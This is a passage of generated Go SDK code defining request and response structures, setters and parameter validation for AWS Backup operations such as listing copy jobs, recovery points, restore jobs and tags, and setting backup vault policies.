MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListCopyJobsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListCopyJobsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListCopyJobsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListCopyJobsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetByAccountId sets the ByAccountId field's value.
func (s *ListCopyJobsInput) SetByAccountId(v string) *ListCopyJobsInput {
s.ByAccountId = &v
return s
}
// SetByCreatedAfter sets the ByCreatedAfter field's value.
func (s *ListCopyJobsInput) SetByCreatedAfter(v time.Time) *ListCopyJobsInput {
s.ByCreatedAfter = &v
return s
}
// SetByCreatedBefore sets the ByCreatedBefore field's value.
func (s *ListCopyJobsInput) SetByCreatedBefore(v time.Time) *ListCopyJobsInput {
s.ByCreatedBefore = &v
return s
}
// SetByDestinationVaultArn sets the ByDestinationVaultArn field's value.
func (s *ListCopyJobsInput) SetByDestinationVaultArn(v string) *ListCopyJobsInput {
s.ByDestinationVaultArn = &v
return s
}
// SetByResourceArn sets the ByResourceArn field's value.
func (s *ListCopyJobsInput) SetByResourceArn(v string) *ListCopyJobsInput {
s.ByResourceArn = &v
return s
}
// SetByResourceType sets the ByResourceType field's value.
func (s *ListCopyJobsInput) SetByResourceType(v string) *ListCopyJobsInput {
s.ByResourceType = &v
return s
}
// SetByState sets the ByState field's value.
func (s *ListCopyJobsInput) SetByState(v string) *ListCopyJobsInput {
s.ByState = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListCopyJobsInput) SetMaxResults(v int64) *ListCopyJobsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListCopyJobsInput) SetNextToken(v string) *ListCopyJobsInput {
s.NextToken = &v
return s
}
type ListCopyJobsOutput struct {
_ struct{} `type:"structure"`
// An array of structures containing metadata about your copy jobs returned
// in JSON format.
CopyJobs []*CopyJob `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListCopyJobsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListCopyJobsOutput) GoString() string {
return s.String()
}
// SetCopyJobs sets the CopyJobs field's value.
func (s *ListCopyJobsOutput) SetCopyJobs(v []*CopyJob) *ListCopyJobsOutput {
s.CopyJobs = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListCopyJobsOutput) SetNextToken(v string) *ListCopyJobsOutput {
s.NextToken = &v
return s
}
type ListProtectedResourcesInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListProtectedResourcesInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListProtectedResourcesInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListProtectedResourcesInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListProtectedResourcesInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListProtectedResourcesInput) SetMaxResults(v int64) *ListProtectedResourcesInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListProtectedResourcesInput) SetNextToken(v string) *ListProtectedResourcesInput {
s.NextToken = &v
return s
}
type ListProtectedResourcesOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// An array of resources successfully backed up by AWS Backup including the
// time the resource was saved, an Amazon Resource Name (ARN) of the resource,
// and a resource type.
Results []*ProtectedResource `type:"list"`
}
// String returns the string representation
func (s ListProtectedResourcesOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListProtectedResourcesOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListProtectedResourcesOutput) SetNextToken(v string) *ListProtectedResourcesOutput {
s.NextToken = &v
return s
}
// SetResults sets the Results field's value.
func (s *ListProtectedResourcesOutput) SetResults(v []*ProtectedResource) *ListProtectedResourcesOutput {
s.Results = v
return s
}
type ListRecoveryPointsByBackupVaultInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// Returns only recovery points that match the specified backup plan ID.
ByBackupPlanId *string `location:"querystring" locationName:"backupPlanId" type:"string"`
// Returns only recovery points that were created after the specified timestamp.
ByCreatedAfter *time.Time `location:"querystring" locationName:"createdAfter" type:"timestamp"`
// Returns only recovery points that were created before the specified timestamp.
ByCreatedBefore *time.Time `location:"querystring" locationName:"createdBefore" type:"timestamp"`
// Returns only recovery points that match the specified resource Amazon Resource
// Name (ARN).
ByResourceArn *string `location:"querystring" locationName:"resourceArn" type:"string"`
// Returns only recovery points that match the specified resource type.
ByResourceType *string `location:"querystring" locationName:"resourceType" type:"string"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListRecoveryPointsByBackupVaultInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRecoveryPointsByBackupVaultInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListRecoveryPointsByBackupVaultInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListRecoveryPointsByBackupVaultInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetBackupVaultName(v string) *ListRecoveryPointsByBackupVaultInput {
s.BackupVaultName = &v
return s
}
// SetByBackupPlanId sets the ByBackupPlanId field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByBackupPlanId(v string) *ListRecoveryPointsByBackupVaultInput {
s.ByBackupPlanId = &v
return s
}
// SetByCreatedAfter sets the ByCreatedAfter field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByCreatedAfter(v time.Time) *ListRecoveryPointsByBackupVaultInput {
s.ByCreatedAfter = &v
return s
}
// SetByCreatedBefore sets the ByCreatedBefore field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByCreatedBefore(v time.Time) *ListRecoveryPointsByBackupVaultInput {
s.ByCreatedBefore = &v
return s
}
// SetByResourceArn sets the ByResourceArn field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByResourceArn(v string) *ListRecoveryPointsByBackupVaultInput {
s.ByResourceArn = &v
return s
}
// SetByResourceType sets the ByResourceType field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByResourceType(v string) *ListRecoveryPointsByBackupVaultInput {
s.ByResourceType = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetMaxResults(v int64) *ListRecoveryPointsByBackupVaultInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetNextToken(v string) *ListRecoveryPointsByBackupVaultInput {
s.NextToken = &v
return s
}
type ListRecoveryPointsByBackupVaultOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// An array of objects that contain detailed information about recovery points
// saved in a backup vault.
RecoveryPoints []*RecoveryPointByBackupVault `type:"list"`
}
// String returns the string representation
func (s ListRecoveryPointsByBackupVaultOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRecoveryPointsByBackupVaultOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListRecoveryPointsByBackupVaultOutput) SetNextToken(v string) *ListRecoveryPointsByBackupVaultOutput {
s.NextToken = &v
return s
}
// SetRecoveryPoints sets the RecoveryPoints field's value.
func (s *ListRecoveryPointsByBackupVaultOutput) SetRecoveryPoints(v []*RecoveryPointByBackupVault) *ListRecoveryPointsByBackupVaultOutput {
s.RecoveryPoints = v
return s
}
type ListRecoveryPointsByResourceInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the resource type.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
}
// String returns the string representation
func (s ListRecoveryPointsByResourceInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRecoveryPointsByResourceInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListRecoveryPointsByResourceInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListRecoveryPointsByResourceInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListRecoveryPointsByResourceInput) SetMaxResults(v int64) *ListRecoveryPointsByResourceInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListRecoveryPointsByResourceInput) SetNextToken(v string) *ListRecoveryPointsByResourceInput {
s.NextToken = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *ListRecoveryPointsByResourceInput) SetResourceArn(v string) *ListRecoveryPointsByResourceInput {
s.ResourceArn = &v
return s
}
type ListRecoveryPointsByResourceOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// An array of objects that contain detailed information about recovery points
// of the specified resource type.
RecoveryPoints []*RecoveryPointByResource `type:"list"`
}
// String returns the string representation
func (s ListRecoveryPointsByResourceOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRecoveryPointsByResourceOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListRecoveryPointsByResourceOutput) SetNextToken(v string) *ListRecoveryPointsByResourceOutput {
s.NextToken = &v
return s
}
// SetRecoveryPoints sets the RecoveryPoints field's value.
func (s *ListRecoveryPointsByResourceOutput) SetRecoveryPoints(v []*RecoveryPointByResource) *ListRecoveryPointsByResourceOutput {
s.RecoveryPoints = v
return s
}
type ListRestoreJobsInput struct {
_ struct{} `type:"structure"`
// The account ID to list the jobs from. Returns only restore jobs associated
// with the specified account ID.
ByAccountId *string `location:"querystring" locationName:"accountId" type:"string"`
// Returns only restore jobs that were created after the specified date.
ByCreatedAfter *time.Time `location:"querystring" locationName:"createdAfter" type:"timestamp"`
// Returns only restore jobs that were created before the specified date.
ByCreatedBefore *time.Time `location:"querystring" locationName:"createdBefore" type:"timestamp"`
// Returns only restore jobs associated with the specified job status.
ByStatus *string `location:"querystring" locationName:"status" type:"string" enum:"RestoreJobStatus"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListRestoreJobsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRestoreJobsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListRestoreJobsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListRestoreJobsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetByAccountId sets the ByAccountId field's value.
func (s *ListRestoreJobsInput) SetByAccountId(v string) *ListRestoreJobsInput {
s.ByAccountId = &v
return s
}
// SetByCreatedAfter sets the ByCreatedAfter field's value.
func (s *ListRestoreJobsInput) SetByCreatedAfter(v time.Time) *ListRestoreJobsInput {
s.ByCreatedAfter = &v
return s
}
// SetByCreatedBefore sets the ByCreatedBefore field's value.
func (s *ListRestoreJobsInput) SetByCreatedBefore(v time.Time) *ListRestoreJobsInput {
s.ByCreatedBefore = &v
return s
}
// SetByStatus sets the ByStatus field's value.
func (s *ListRestoreJobsInput) SetByStatus(v string) *ListRestoreJobsInput {
s.ByStatus = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListRestoreJobsInput) SetMaxResults(v int64) *ListRestoreJobsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListRestoreJobsInput) SetNextToken(v string) *ListRestoreJobsInput {
s.NextToken = &v
return s
}
type ListRestoreJobsOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// An array of objects that contain detailed information about jobs to restore
// saved resources.
RestoreJobs []*RestoreJobsListMember `type:"list"`
}
// String returns the string representation
func (s ListRestoreJobsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRestoreJobsOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListRestoreJobsOutput) SetNextToken(v string) *ListRestoreJobsOutput {
s.NextToken = &v
return s
}
// SetRestoreJobs sets the RestoreJobs field's value.
func (s *ListRestoreJobsOutput) SetRestoreJobs(v []*RestoreJobsListMember) *ListRestoreJobsOutput {
s.RestoreJobs = v
return s
}
type ListTagsInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the type of resource. Valid targets for ListTags are
// recovery points, backup plans, and backup vaults.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
}
// String returns the string representation
func (s ListTagsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListTagsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListTagsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListTagsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListTagsInput) SetMaxResults(v int64) *ListTagsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListTagsInput) SetNextToken(v string) *ListTagsInput {
s.NextToken = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *ListTagsInput) SetResourceArn(v string) *ListTagsInput {
s.ResourceArn = &v
return s
}
type ListTagsOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// To help organize your resources, you can assign your own metadata to the
// resources you create. Each tag is a key-value pair.
Tags map[string]*string `type:"map" sensitive:"true"`
}
// String returns the string representation
func (s ListTagsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListTagsOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListTagsOutput) SetNextToken(v string) *ListTagsOutput {
s.NextToken = &v
return s
}
// SetTags sets the Tags field's value.
func (s *ListTagsOutput) SetTags(v map[string]*string) *ListTagsOutput {
s.Tags = v
return s
}
// Indicates that a required parameter is missing.
type MissingParameterValueException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s MissingParameterValueException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s MissingParameterValueException) GoString() string {
return s.String()
}
func newErrorMissingParameterValueException(v protocol.ResponseMetadata) error {
return &MissingParameterValueException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *MissingParameterValueException) Code() string {
return "MissingParameterValueException"
}
// Message returns the exception's message.
func (s *MissingParameterValueException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *MissingParameterValueException) OrigErr() error {
return nil
}
func (s *MissingParameterValueException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *MissingParameterValueException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *MissingParameterValueException) RequestID() string {
return s.RespMetadata.RequestID
}
// Contains an optional backup plan display name and an array of BackupRule
// objects, each of which specifies a backup rule. Each rule in a backup plan
// is a separate scheduled task and can back up a different selection of AWS
// resources.
type Plan struct {
_ struct{} `type:"structure"`
// Contains a list of BackupOptions for each resource type.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// The display name of a backup plan.
//
// BackupPlanName is a required field
BackupPlanName *string `type:"string" required:"true"`
// An array of BackupRule objects, each of which specifies a scheduled task
// that is used to back up a selection of resources.
//
// Rules is a required field
Rules []*Rule `type:"list" required:"true"`
}
// String returns the string representation
func (s Plan) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Plan) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *Plan) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *Plan {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanName sets the BackupPlanName field's value.
func (s *Plan) SetBackupPlanName(v string) *Plan {
s.BackupPlanName = &v
return s
}
// SetRules sets the Rules field's value.
func (s *Plan) SetRules(v []*Rule) *Plan {
s.Rules = v
return s
}
// Contains an optional backup plan display name and an array of BackupRule
// objects, each of which specifies a backup rule. Each rule in a backup plan
// is a separate scheduled task and can back up a different selection of AWS
// resources.
type PlanInput struct {
_ struct{} `type:"structure"`
// Specifies a list of BackupOptions for each resource type. These settings
// are only available for Windows VSS backup jobs.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// The optional display name of a backup plan.
//
// BackupPlanName is a required field
BackupPlanName *string `type:"string" required:"true"`
// An array of BackupRule objects, each of which specifies a scheduled task
// that is used to back up a selection of resources.
//
// Rules is a required field
Rules []*RuleInput `type:"list" required:"true"`
}
// String returns the string representation
func (s PlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *PlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "PlanInput"}
if s.BackupPlanName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanName"))
}
if s.Rules == nil {
invalidParams.Add(request.NewErrParamRequired("Rules"))
}
if s.Rules != nil {
for i, v := range s.Rules {
if v == nil {
continue
}
if err := v.Validate(); err != nil {
invalidParams.AddNested(fmt.Sprintf("%s[%v]", "Rules", i), err.(request.ErrInvalidParams))
}
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *PlanInput) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *PlanInput {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanName sets the BackupPlanName field's value.
func (s *PlanInput) SetBackupPlanName(v string) *PlanInput {
s.BackupPlanName = &v
return s
}
// SetRules sets the Rules field's value.
func (s *PlanInput) SetRules(v []*RuleInput) *PlanInput {
s.Rules = v
return s
}
// An object specifying metadata associated with a backup plan template.
type PlanTemplatesListMember struct {
_ struct{} `type:"structure"`
// Uniquely identifies a stored backup plan template.
BackupPlanTemplateId *string `type:"string"`
// The optional display name of a backup plan template.
BackupPlanTemplateName *string `type:"string"`
}
// String returns the string representation
func (s PlanTemplatesListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PlanTemplatesListMember) GoString() string {
return s.String()
}
// SetBackupPlanTemplateId sets the BackupPlanTemplateId field's value.
func (s *PlanTemplatesListMember) SetBackupPlanTemplateId(v string) *PlanTemplatesListMember {
s.BackupPlanTemplateId = &v
return s
}
// SetBackupPlanTemplateName sets the BackupPlanTemplateName field's value.
func (s *PlanTemplatesListMember) SetBackupPlanTemplateName(v string) *PlanTemplatesListMember {
s.BackupPlanTemplateName = &v
return s
}
// Contains metadata about a backup plan.
type PlansListMember struct {
_ struct{} `type:"structure"`
// Contains a list of BackupOptions for a resource type.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The display name of a saved backup plan.
BackupPlanName *string `type:"string"`
// The date and time a resource backup plan is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The date and time a backup plan is deleted, in Unix format and Coordinated
// Universal Time (UTC). The value of DeletionDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
DeletionDate *time.Time `type:"timestamp"`
// The last time a job to back up resources was run with this rule. A date and
// time, in Unix format and Coordinated Universal Time (UTC). The value of LastExecutionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
LastExecutionDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version IDs cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s PlansListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PlansListMember) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *PlansListMember) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *PlansListMember {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *PlansListMember) SetBackupPlanArn(v string) *PlansListMember {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *PlansListMember) SetBackupPlanId(v string) *PlansListMember {
s.BackupPlanId = &v
return s
}
// SetBackupPlanName sets the BackupPlanName field's value.
func (s *PlansListMember) SetBackupPlanName(v string) *PlansListMember {
s.BackupPlanName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *PlansListMember) SetCreationDate(v time.Time) *PlansListMember {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *PlansListMember) SetCreatorRequestId(v string) *PlansListMember {
s.CreatorRequestId = &v
return s
}
// SetDeletionDate sets the DeletionDate field's value.
func (s *PlansListMember) SetDeletionDate(v time.Time) *PlansListMember {
s.DeletionDate = &v
return s
}
// SetLastExecutionDate sets the LastExecutionDate field's value.
func (s *PlansListMember) SetLastExecutionDate(v time.Time) *PlansListMember {
s.LastExecutionDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *PlansListMember) SetVersionId(v string) *PlansListMember {
s.VersionId = &v
return s
}
// A structure that contains information about a backed-up resource.
type ProtectedResource struct {
_ struct{} `type:"structure"`
// The date and time a resource was last backed up, in Unix format and Coordinated
// Universal Time (UTC). The value of LastBackupTime is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
LastBackupTime *time.Time `type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource; for example, an Amazon Elastic Block Store (Amazon
// EBS) volume or an Amazon Relational Database Service (Amazon RDS) database.
// For VSS Windows backups, the only supported resource type is Amazon EC2.
ResourceType *string `type:"string"`
}
// String returns the string representation
func (s ProtectedResource) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ProtectedResource) GoString() string {
return s.String()
}
// SetLastBackupTime sets the LastBackupTime field's value.
func (s *ProtectedResource) SetLastBackupTime(v time.Time) *ProtectedResource {
s.LastBackupTime = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *ProtectedResource) SetResourceArn(v string) *ProtectedResource {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *ProtectedResource) SetResourceType(v string) *ProtectedResource {
s.ResourceType = &v
return s
}
type PutBackupVaultAccessPolicyInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// The backup vault access policy document in JSON format.
Policy *string `type:"string"`
}
// String returns the string representation
func (s PutBackupVaultAccessPolicyInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PutBackupVaultAccessPolicyInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *PutBackupVaultAccessPolicyInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "PutBackupVaultAccessPolicyInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *PutBackupVaultAccessPolicyInput) SetBackupVaultName(v string) *PutBackupVaultAccessPolicyInput {
s.BackupVaultName = &v
return s
}
// SetPolicy sets the Policy field's value.
func (s *PutBackupVaultAccessPolicyInput) SetPolicy(v string) *PutBackupVaultAccessPolicyInput {
s.Policy = &v
return s
}
type PutBackupVaultAccessPolicyOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s PutBackupVaultAccessPolicyOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PutBackupVaultAccessPolicyOutput) GoString() string {
return s.String()
}
type PutBackupVaultNotificationsInput struct {
_ struct{} `type:"structure"`
// An array of events that indicate the status of jobs to back up resources
// to the backup vault.
//
// BackupVaultEvents is a required field
BackupVaultEvents []*string `type:"list" required:"true"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
